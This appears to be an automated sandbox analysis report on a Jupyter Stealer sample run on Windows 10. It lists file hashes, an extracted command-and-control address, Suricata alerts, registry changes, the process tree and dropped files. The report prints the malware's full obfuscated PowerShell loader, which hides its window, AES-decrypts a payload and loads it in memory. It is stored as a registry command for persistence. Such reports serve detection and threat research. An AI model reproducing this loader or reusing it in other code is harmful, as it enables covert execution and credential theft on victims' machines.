Analysis
-
max time kernel
138s -
max time network
298s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
13-06-2022 00:01
Static task
static1
General
-
Target
ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe
-
Size
210.1MB
-
MD5
1562c0e1c4a24abeff34aaa388a4aa53
-
SHA1
67934a51c548fd77787cc26fa9952a8cd302970b
-
SHA256
ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab
-
SHA512
f3e5d23f2454fbe33d337ec4ca5dce81c8638c9d5cf2057db789991ced11888087f8a3da0d5fb0869d38957d6fd60984244065e095137f5a67cf070e8f5e6edb
Malware Config
Extracted
jupyter
http://37.120.247.120
Signatures
-
suricata: ET MALWARE Jupyter Stealer CnC Checkin
suricata: ET MALWARE Jupyter Stealer CnC Checkin
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 4040 powershell.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QhGywHLreAszXutEwsWWihf.lnk powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 348 2932 WerFault.exe ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe -
Modifies registry class 7 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss powershell.exe Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\znmroizkuvzkfkiogetiwusss\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('9Qw7HmyNbXwDhTl1BCWQ9HiCHVJ6biS29AI3joRqFsE=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\pVbWJYZDDCSHJ\\YmZzDuyJLaoZWFP.KQCAccTWwYOdCobshuYIIWjvAgPA'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[WMjltFazGzRYICFIoq5XoJDM1T0sO959lZpC3tdMx9r6rF4.aOQnwFCqXLWVnkObggxLLxB9CQD8t3NAI8E_o_VOjfEb3SskE3Fab05w_MOsLyIbBovKJMjkKSlk9pTjBqWv]::RRye6ZIFpv7n8DDuAo9IugHH9lFCZ();\"" powershell.exe Key created \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.kqcacctwwyodcobshuyiiwjvagpa powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\.kqcacctwwyodcobshuyiiwjvagpa\ = "znmroizkuvzkfkiogetiwusss" powershell.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepid process 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe 4368 powershell.exe 4368 powershell.exe 4368 powershell.exe 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4040 powershell.exe Token: SeDebugPrivilege 4368 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exepowershell.execsc.exedescription pid process target process PID 2932 wrote to memory of 4040 2932 ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe powershell.exe PID 2932 wrote to memory of 4040 2932 ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe powershell.exe PID 4040 wrote to memory of 4340 4040 powershell.exe csc.exe PID 4040 wrote to memory of 4340 4040 powershell.exe csc.exe PID 4340 wrote to memory of 3708 4340 csc.exe cvtres.exe PID 4340 wrote to memory of 3708 4340 csc.exe cvtres.exe PID 2932 wrote to memory of 4368 2932 ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe powershell.exe PID 2932 wrote to memory of 4368 2932 ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe"C:\Users\Admin\AppData\Local\Temp\ba8bd18660f8d9da758e35d8d777328dfce5166bfd60fa3a62011ac4abd226ab.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell"2⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m2slr0sk\m2slr0sk.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5E80.tmp" "c:\Users\Admin\AppData\Local\Temp\m2slr0sk\CSCA8B179817ABA4314ACF645DDFC6D16A1.TMP"4⤵PID:3708
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2932 -s 9442⤵
- Program crash
PID:348
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
50KB
MD52143b379fed61ab5450bab1a751798ce
SHA132f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA5120bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa
-
Filesize
1KB
MD57323216a4b3cb72a8e4b9e18769a63d7
SHA1e35e0b917b06e1bc586d031a5e27cdec42db5c17
SHA2561fd38a3bedb9b5e4337d8834eb2d1cfd87618959b92898accd49241b737bc900
SHA51254ae2c3fa700a400973cc3ad437bfa4c359dccddfcf9012921bc598dde0aa513f44047793018fc75e3159dbfb5a171a6a2f40a6a39dfbc44e69800a8eed2eaab
-
Filesize
3KB
MD5e2fc3e1ad6b1857e10377afba34315a2
SHA1b8b239cb809359e0d9893fe993cbf5fe3076cd91
SHA256f8c6fb96d781568e280d1c524b63a1932d7abbec6fc8558f6b2959ba360758dd
SHA5127adc76e3c25c01c4786433f9d76c4b4876165ca455192847077e673c90731d9b741d87962961b7c31f72dd2afdb7729b743143968b90f171d48cdedb8c2848a3
-
Filesize
652B
MD51c11d3ae5fd77a79312b6c30d0a66553
SHA196bf5d3745727569a87594103400b107da643152
SHA2569956ebc42062cb7aa5317cb483dc43b4ae186ccb41cd7b57a7ef22b0abe9a7d9
SHA512bc137488d97f6bfe6cbd5107c23d3b497e0b2618c5a78b8c4eb3f0946cb13dcbc516b869446710e8f25be5cad2d0c319302d7edf2d5f4b171ac12ef436ccb239
-
Filesize
236B
MD52f9b4948ac0b26204994e246094a9f5d
SHA19870e53ad61eba593a2074d2a30202f7e3df09f7
SHA256def6ec20884e30f8689cb1ccb8fb62735db528c5277f52f64ecae170cfd49776
SHA512ef5f9056b36c8f9204a65b26244f225a9c2cc3bf5b1c46055e6eda06e63769243538b568b29627eb497289777fa69468e64b5eae0fb666bbb2e432a3059154d1
-
Filesize
369B
MD51eeb07bec0c50ea3fde3eb7ebbf2696c
SHA19ab2dc69969b2b3567978960338ed5fb4bbdba06
SHA256377c3d45039c7df67f3e1779059c0aceb6be66e4a97c745e956840d005fe16b4
SHA512f0bcd40d1bfc147c367dd8660f95780c4cae5df7f85fb161270e70029d9e4e9f4c3fa4f826cd286ce366361f41d755f28781d10a3a3300166cd8bc286b10c626